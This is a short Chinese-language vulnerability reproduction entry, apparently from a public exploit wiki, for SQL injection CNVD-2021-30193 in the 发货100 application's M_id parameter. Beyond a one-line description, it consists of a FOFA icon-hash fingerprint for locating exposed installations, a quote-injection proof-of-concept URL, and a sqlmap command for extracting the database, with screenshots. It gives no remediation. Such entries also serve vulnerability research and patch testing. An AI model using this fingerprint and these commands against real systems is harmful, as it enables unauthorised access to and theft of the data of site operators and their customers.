发货100 M_id SQL注入漏洞 CNVD-2021-30193.md
1.26 KB / 2021-07-04 06:01:08
# 发货100 M_id SQL注入漏洞 CNVD-2021-30193
## 漏洞描述
发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
> [!NOTE]
>
> 发货100
## FOFA
> [!NOTE]
>
> icon_hash="1420424513"
## 漏洞复现
主页面如下
![image-20210602204745265](http://wikioss.peiqi.tech/vuln/image-20210602204745265.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
使用POC
```
/?M_id=1%27&type=product
```
![image-20210602204842198](http://wikioss.peiqi.tech/vuln/image-20210602204842198.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
数据库出现报错, 使用Sqlmap注入
```
sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
```
![image-20210602233608318](http://wikioss.peiqi.tech/vuln/image-20210602233608318.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)